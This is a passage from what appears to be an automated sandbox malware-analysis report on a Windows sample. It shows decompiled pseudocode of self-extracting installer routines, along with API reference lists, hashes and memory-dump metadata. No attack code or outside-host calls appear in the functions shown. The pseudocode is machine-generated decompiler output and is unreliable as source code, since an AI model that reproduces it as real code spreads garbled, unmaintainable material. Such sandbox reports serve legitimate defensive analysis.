				_t16 =  *0x10d8004; // 0x261cebeb
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x10d9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E010D1680(_t65, E010D17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E010D65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E010D1680(_t65, E010D17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E010D6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x010d2aac
0x010d2ab7
0x010d2abc
0x010d2abe
0x010d2ac3
0x010d2ac6
0x010d2ac9
0x010d2ace
0x010d2ae6
0x010d2bdc
0x010d2bdc
0x010d2be0
0x00000000
0x00000000
0x010d2af2
0x010d2afc
0x010d2b00
0x010d2b05
0x010d2b05
0x010d2b0b
0x010d2bca
0x010d2bd1
0x010d2b11
0x010d2b18
0x010d2b26
0x010d2b99
0x010d2bc8
0x00000000
0x00000000
0x010d2b9b
0x010d2bae
0x010d2bb3
0x010d2bb5
0x010d2bb5
0x010d2bb8
0x010d2bb8
0x010d2bba
0x010d2bbb
0x00000000
0x010d2bb8
0x010d2b28
0x010d2b2e
0x010d2b33
0x010d2b39
0x010d2b3c
0x010d2b3c
0x010d2b3e
0x010d2b3f
0x010d2b55
0x010d2b5d
0x010d2b64
0x010d2b64
0x010d2b7a
0x010d2b7f
0x010d2b81
0x010d2b81
0x010d2b84
0x010d2b84
0x010d2b86
0x010d2b87
0x010d2bbf
0x010d2bc1
0x010d2bc1
0x010d2b26
0x010d2bda
0x010d2bda
0x010d2be6
0x010d2be6
0x010d2bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010D2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 010D2AF2
CharNextA.USER32(?), ref: 010D2B12
CharUpperA.USER32 ref: 010D2B1E
CharPrevA.USER32(?,?), ref: 010D2B55
CharNextA.USER32(?), ref: 010D2BD4

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 58dc4d5e6137a29ac59ac4ff64c1cc32aa7059256d1ca200806aff194ac9d9f9
Instruction ID: 60d7d86120d8d08918df4a71e9fa53ba7b73dafe168394525f39c6f1d90ec185
Opcode Fuzzy Hash: 58dc4d5e6137a29ac59ac4ff64c1cc32aa7059256d1ca200806aff194ac9d9f9
Instruction Fuzzy Hash: 8D4118346043469FDF669F388854AFD7FA99F46320F0440DAECC287202DF7A4A86CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010D43D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E010D43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x10d8004; // 0x261cebeb
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E010D6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x010d43d0
0x010d43d8
0x010d43df
0x010d43e6
0x010d43ec
0x010d43f1
0x010d4400
0x010d4403
0x010d440b
0x010d4420
0x010d4429
0x010d4437
0x010d4444
0x010d4447
0x010d444d
0x010d4454
0x010d445b
0x010d4460
0x010d4461
0x010d4467
0x010d446f
0x010d4473
0x010d4473
0x010d4463
0x010d4463
0x010d4463
0x010d447a
0x010d4481
0x010d4484
0x010d448a
0x010d4492
0x010d4496
0x010d4496
0x010d4486
0x010d4486
0x010d4486
0x010d44b8

APIs

GetWindowRect.USER32(?,?), ref: 010D43F1
GetWindowRect.USER32(00000000,?), ref: 010D440B
GetDC.USER32(?), ref: 010D4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 010D442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 010D443A
ReleaseDC.USER32(?,00000000), ref: 010D4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010D44A2

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: a33d349861f8dd773c7d2e40bd2adca0baafa087f95f1b9ec30c6bdf644cb6a2
Instruction ID: a39bc5c6ce436d90c1c018c0fc32957bfef0124b8f8d874e0ab644b788be2fe8
Opcode Fuzzy Hash: a33d349861f8dd773c7d2e40bd2adca0baafa087f95f1b9ec30c6bdf644cb6a2
Instruction Fuzzy Hash: D0314C36F01219AFCB14CFB8D9889EEBBB5EB89310F154169F845F3244DA35AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010D6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E010D6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x10d8004; // 0x261cebeb
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E010D171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x10d9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x10da288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E010D171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E010D6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x010d6298
0x010d62a0
0x010d62a7
0x010d62ad
0x010d62af
0x010d62bb
0x010d62c3
0x010d62c4
0x010d633b
0x010d633b
0x010d6345
0x010d634d
0x00000000
0x00000000
0x010d62da
0x010d62de
0x010d635f
0x010d6369
0x010d62e0
0x010d62e0
0x010d62e0
0x010d62e3
0x010d62e5
0x010d62e5
0x010d62e8
0x010d62e8
0x010d62ea
0x010d62eb
0x010d62ef
0x010d62f1
0x010d62f3
0x010d6302
0x010d6308
0x010d630d
0x010d6314
0x010d6314
0x010d6316
0x010d6319
0x010d6355
0x010d6357
0x010d631b
0x010d631b
0x010d6331
0x010d6334
0x010d6339
0x00000000
0x010d6339
0x010d6319
0x010d636b
0x010d637d
0x010d637d
0x00000000

APIs

Part of subcall function 010D171E: _vsnprintf.MSVCRT ref: 010D1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010D6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010D51CA,00000004,00000024,010D2F71,?,00000002,00000000), ref: 010D6357

Strings

UPDFILE%lu, xrefs: 010D62B3, 010D6329

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 5b8f3b9528e3a6f45a81d147806e22adb3b97cc454c0e9938dd83829476ec852
Instruction ID: eafcae948d7a83224712c047b25765c22b6ee6561c54dea6767eddbb8e272d05
Opcode Fuzzy Hash: 5b8f3b9528e3a6f45a81d147806e22adb3b97cc454c0e9938dd83829476ec852
Instruction Fuzzy Hash: 1021B175A01319ABDB209FA5DC459FEBB78FF49714B004159FA82A3201DB3B99028BE0

Uniqueness

Uniqueness Score: -1.00%

Function 010D681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E010D681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x10d8004; // 0x261cebeb
				_v8 = _t19 ^ _t44;
				_t41 =  *0x10d81d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x10d81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x10d81d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x10d1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E010D66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x10d81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E010D6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x010d681f
0x010d682a
0x010d6831
0x010d6836
0x010d683c
0x010d683e
0x010d6848
0x010d6851
0x010d685d
0x010d6864
0x010d6876
0x010d693a
0x010d693a
0x010d687c
0x010d687e
0x010d6885
0x00000000
0x010d68d6
0x010d68f4
0x010d6900
0x010d6902
0x010d690a
0x00000000
0x010d690c
0x010d690c
0x010d691c
0x00000000
0x010d691e
0x010d6924
0x010d692b
0x010d6932
0x00000000
0x00000000
0x00000000
0x010d692b
0x010d691c
0x010d690a
0x010d6885
0x010d6876
0x010d6951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010D686E
GetSystemMetrics.USER32(0000004A), ref: 010D68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010D68CC
RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,?,0000000C), ref: 010D68F4
RegCloseKey.ADVAPI32(?), ref: 010D6902

Part of subcall function 010D66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010D691A), ref: 010D6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 010D68C2

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: a1ddcb2fabe611b4c590f6752fbda34e1d5e9525309e79f661a6c679b1f92d4a
Instruction ID: 35dbbeb920bfdb71449df6871520d112ff26c760ebba1734d82daf2e57241b1d
Opcode Fuzzy Hash: a1ddcb2fabe611b4c590f6752fbda34e1d5e9525309e79f661a6c679b1f92d4a
Instruction Fuzzy Hash: F331BF31A01328DFDB31DB25CC04BEABBBCEB45728F0441E5E9C9A2240DB369A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 010D3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E010D468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x10d8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E010D468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x10d8d4c, "<None>") == 0) {
							LocalFree( *0x10d8d4c);
							L9:
							 *0x10d9124 = 0;
							return 1;
						}
						_t9 = E010D6517(_t19, 0x7d1, 0, E010D3100, 0, 0);
						LocalFree( *0x10d8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x10d9124 = 0x800704c7;
						L2:
						return 0;
					}
					E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x10d8d4c);
					 *0x10d9124 = 0x80070714;
					goto L2;
				}
				E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x10d9124 = E010D6285();
				goto L2;
			}

0x010d3a46
0x010d3a57
0x010d3a5d
0x010d3a63
0x010d3a6a
0x010d3a91
0x010d3a9a
0x010d3ad8
0x010d3b13
0x010d3b19
0x010d3b1b
0x00000000
0x010d3b21
0x010d3ae7
0x010d3af4
0x010d3afc
0x00000000
0x00000000
0x010d3afe
0x010d3a87
0x00000000
0x010d3a87
0x010d3aa8
0x010d3ab3
0x010d3ab9
0x00000000
0x010d3ab9
0x010d3a78
0x010d3a82
0x00000000

APIs

Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010D2F64,?,00000002,00000000), ref: 010D3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010D3AB3

Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010D4554

Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 010D3AD0
LocalFree.KERNEL32 ref: 010D3B13

Part of subcall function 010D6517: FindResourceA.KERNEL32(010D0000,000007D6,00000005), ref: 010D652A
Part of subcall function 010D6517: LoadResource.KERNEL32(010D0000,00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010D6538
Part of subcall function 010D6517: DialogBoxIndirectParamA.USER32(010D0000,00000000,00000547,010D19E0,00000000), ref: 010D6557
Part of subcall function 010D6517: FreeResource.KERNEL32(00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010D6560

LocalFree.KERNEL32(00000000,010D3100,00000000,00000000), ref: 010D3AF4

Strings

<None>, xrefs: 010D3AC5
LICENSE, xrefs: 010D3A46

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: ff89d49b2123b624564249f13ae596b4a9ea1d06d5522cd3a10469d01ce8c5a6
Instruction ID: 4dd91eac1c6de813060fe98d8434212d624c28c95947da7688c0a5efd10f17b9
Opcode Fuzzy Hash: ff89d49b2123b624564249f13ae596b4a9ea1d06d5522cd3a10469d01ce8c5a6
Instruction Fuzzy Hash: D2118774702301ABD7346F7A9C09E5B3AF9EBD5750B00442EBDC5DA598DA7F88008765

Uniqueness

Uniqueness Score: -1.00%

Function 010D24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E010D24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x10d8004; // 0x261cebeb
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E010D658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E010D6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x010d24e0
0x010d24eb
0x010d24f2
0x010d24f7
0x010d2504
0x010d250e
0x010d251d
0x010d252c
0x010d2541
0x010d2546
0x010d2553
0x010d2555
0x010d2555
0x010d2546
0x010d256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010D2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010D252C
_lopen.KERNEL32(?,00000040), ref: 010D253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 010D254C
_lclose.KERNEL32(00000000), ref: 010D2555

Strings

wininit.ini, xrefs: 010D2510

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 2d000250fcac8232e402b08febc167d1b3bc335904bf92b82dba539bf00b14c5
Instruction ID: a2bd71e73a5d6698a95c03ab6920b2123968415a0a55d991d4d4ac23e9b9c915
Opcode Fuzzy Hash: 2d000250fcac8232e402b08febc167d1b3bc335904bf92b82dba539bf00b14c5
Instruction Fuzzy Hash: 28015232701218A7D7309A699C08EEB7FBCDB55750F440195FA89D3184DA798A458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010D36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E010D36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x10d8004; // 0x261cebeb
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x10d8184 = 1;
						 *0x10d8180 = 1;
						L13:
						 *0x10d9a40 = _t119;
						L14:
						__eflags =  *0x10d8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E010D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E010D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x10d8a38 & 0x00000001;
											if(( *0x10d8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E010D681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E010D67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
